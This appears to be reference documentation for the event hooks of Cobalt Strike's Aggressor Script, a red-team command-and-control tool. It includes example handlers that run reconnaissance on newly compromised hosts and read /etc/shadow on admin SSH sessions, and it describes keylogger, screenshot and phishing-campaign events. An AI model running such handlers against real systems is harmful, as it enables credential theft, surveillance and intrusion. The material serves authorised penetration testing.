Events

These are the events fired by Aggressor Script.

*

This event fires whenever any Aggressor Script event fires.

Arguments

$1 - the original event name

... - the arguments to the event

Example

# event spy script
on * {
   println("[ $+ $1 $+ ]: " . subarray(@_, 1));
}

beacon_checkin

Fired when a Beacon checkin acknowledgement is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacon_error

Fired when an error is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacon_indicator

Fired when an indicator of compromise notice is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the user responsible for the input

$3 - the text of the message

$4 - when this message occurred

beacon_initial

Fired when a Beacon calls home for the first time.

Arguments

$1 - the ID of the beacon that called home.

Example

on beacon_initial {
   # list network connections
   bshell($1, "netstat -na | findstr \"ESTABLISHED\"");
 
   # list shares
   bshell($1, "net use");
 
   # list groups
   bshell($1, "whoami /groups");
}

beacon_initial_empty

Fired when a DNS Beacon calls home for the first time. At this point, no metadata has been exchanged.

Arguments

$1 - the ID of the beacon that called home.

Example

on beacon_initial_empty {
   binput($1, "[Acting on new DNS Beacon]");
 
   # change the data channel to DNS TXT
   bmode($1, "dns-txt");
 
   # request the Beacon checkin and send its metadata
   bcheckin($1);
}

beacon_input

Fired when an input message is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the user responsible for the input

$3 - the text of the message

$4 - when this message occurred

beacon_mode

Fired when a mode change acknowledgement is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacon_output

Fired when output is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacon_output_alt

Fired when (alternate) output is posted to a Beacon's console. What makes for alternate output? It's just different presentation from normal output.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacon_output_jobs

Fired when jobs output is sent to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the jobs output

$3 - when this message occurred

beacon_output_ls

Fired when ls output is sent to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the ls output

$3 - when this message occurred

beacon_output_ps

Fired when ps output is sent to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the ps output

$3 - when this message occurred

beacon_tasked

Fired when a task acknowledgement is posted to a Beacon's console.

Arguments

$1 - the ID of the beacon

$2 - the text of the message

$3 - when this message occurred

beacons

Fired when the team server sends over fresh information on all of our Beacons. This occurs about once each second.

Arguments

$1 - an array of dictionary objects with metadata for each Beacon.

custom_event_<event name>

Fired when a client receives a custom event from another client.

Arguments

$1 - who sent the custom event

$2 - the event data

$3 - the time the event was sent

Example

# subscribe to the my-topic custom event
on "custom_event_my-topic" {
println("Received my-topic:")
println("\tSender: $1");
println("\tData: $2");
println("\tTimestamp: $3");
}

disconnect

Fired when this Cobalt Strike becomes disconnected from the team server.

event_action

Fired when a user performs an action in the event log. This is similar to an action on IRC (the /me command)

Arguments

$1 - who the message is from

$2 - the contents of the message

$3 - the time the message was posted

event_beacon_initial

Fired when an initial beacon message is posted to the event log.

Arguments

$1 - the contents of the message

$2 - the time the message was posted

event_join

Fired when a user connects to the team server

Arguments

$1 - who joined the team server

$2 - the time the message was posted

event_newsite

Fired when a new site message is posted to the event log.

Arguments

$1 - who setup the new site

$2 - the contents of the new site message

$3 - the time the message was posted

event_notify

Fired when a message from the team server is posted to the event log.

Arguments

$1 - the contents of the message

$2 - the time the message was posted

event_nouser

Fired when the current Cobalt Strike client tries to interact with a user who is not connected to the team server.

Arguments

$1 - who is not present

$2 - the time the message was posted

event_private

Fired when a private message is posted to the event log.

Arguments

$1 - who the message is from

$2 - who the message is directed to

$3 - the contents of the message

$4 - the time the message was posted

event_public

Fired when a public message is posted to the event log.

Arguments

$1 - who the message is from

$2 - the contents of the message

$3 - the time the message was posted

event_quit

Fired when someone disconnects from the team server.

Arguments

$1 - who left the team server

$2 - the time the message was posted

heartbeat_10m

Fired every ten minutes

heartbeat_10s

Fired every ten seconds

heartbeat_15m

Fired every fifteen minutes

heartbeat_15s

Fired every fifteen seconds

heartbeat_1m

Fired every minute

heartbeat_1s

Fired every second

heartbeat_20m

Fired every twenty minutes

heartbeat_30m

Fired every thirty minutes

heartbeat_30s

Fired every thirty seconds

heartbeat_5m

Fired every five minutes

heartbeat_5s

Fired every five seconds

heartbeat_60m

Fired every sixty minutes

keylogger_hit

Fired when there are new results reported to the web server via the cloned site keystroke logger.

Arguments

$1 - external address of visitor

$2 - reserved

$3 - the logged keystrokes

$4 - the phishing token for these recorded keystrokes.

keystrokes

Fired when Cobalt Strike receives keystrokes

Arguments

$1 - a dictionary with information about the keystrokes.

Key Value
bid Beacon ID for session keystrokes originated from
data keystroke data reported in this batch
id identifier for this keystroke buffer
session desktop session from keystroke logger
title last active window title from keystroke logger
user username from keystroke logger
when timestamp of when these results were generated

Example

on keystrokes {
   if ("*Admin*" iswm $1["title"]) {
      blog($1["bid"], "Interesting keystrokes received. 
      Go to \c4View -> Keystrokes\o and look for the green buffer.");
      highlight("keystrokes", @($1), "good");
   }
}

profiler_hit

Fired when there are new results reported to the System Profiler.

Arguments

$1 - external address of visitor

$2 - de-cloaked internal address of visitor (or "unknown")

$3 - visitor's User-Agent

$4 - a dictionary containing the applications.

$5 - the phishing token of the visitor (use &tokenToEmail to resolve to an email address)

ready

Fired when this Cobalt Strike client is connected to the team server and ready to act.

screenshots

Fired when Cobalt Strike receives a screenshot.

Arguments

$1 - a dictionary with information about the screenshot.

Key Value
bid Beacon ID for session screenshot originated from
data raw screenshot data (this is a .jpg file)
id identifier for this screenshot
session desktop session reported by screenshot tool
title active window title from screenshot tool
user username from screenshot tool
when timestamp of when this screenshot was received

Example

# watch for any screenshots where someone is banking and
# redact it from the user-interface.
on screenshots {
	local('$title');
	$title = lc($1["title"]);	
	
	if ("*bankofamerica*" iswm $title) {
		redactobject($1["id"]);
	}
	else if ("jpmc*" iswm $title) {
		redactobject($1["id"]);
	}
}

sendmail_done

Fired when a phishing campaign completes

Arguments

$1 - the campaign ID

sendmail_post

Fired after a phish is sent to an email address.

Arguments

$1 - the campaign ID

$2 - the email we're sending a phish to

$3 - the status of the phish (e.g., SUCCESS)

$4 - the message from the mail server

sendmail_pre

Fired before a phish is sent to an email address.

Arguments

$1 - the campaign ID

$2 - the email we're sending a phish to

sendmail_start

Fired when a new phishing campaign kicks off.

Arguments

$1 - the campaign ID

$2 - number of targets

$3 - local path to attachment

$4 - the bounce to address

$5 - the mail server string

$6 - the subject of the phishing email

$7 - the local path to the phishing template

$8 - the URL to embed into the phish

ssh_checkin

Fired when an SSH client checkin acknowledgement is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the text of the message

$3 - when this message occurred

ssh_error

Fired when an error is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the text of the message

$3 - when this message occurred

ssh_indicator

Fired when an indicator of compromise notice is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the user responsible for the input

$3 - the text of the message

$4 - when this message occurred

ssh_initial

Fired when an SSH session is seen for the first time.

Arguments

$1 - the ID of the session

Example

on ssh_initial {
   if (-isadmin $1) {
      bshell($1, "cat /etc/shadow");
   }
}

ssh_input

Fired when an input message is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the user responsible for the input

$3 - the text of the message

$4 - when this message occurred

ssh_output

Fired when output is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the text of the message

$3 - when this message occurred

ssh_output_alt

Fired when (alternate) output is posted to an SSH console. What makes for alternate output? It's just different presentation from normal output.

Arguments

$1 - the ID of the session

$2 - the text of the message

$3 - when this message occurred

ssh_tasked

Fired when a task acknowledgement is posted to an SSH console.

Arguments

$1 - the ID of the session

$2 - the text of the message

$3 - when this message occurred

web_hit

Fired when there's a new hit on Cobalt Strike's web server.

Arguments

$1 - the method (e.g., GET, POST)

$2 - the requested URI

$3 - the visitor's address

$4 - the visitor's User-Agent string

$5 - the web server's response to the hit (e.g., 200)

$6 - the size of the web server's response

$7 - a description of the handler that processed this hit.

$8 - a dictionary containing the parameters sent to the web server

$9 - the time when the hit took place.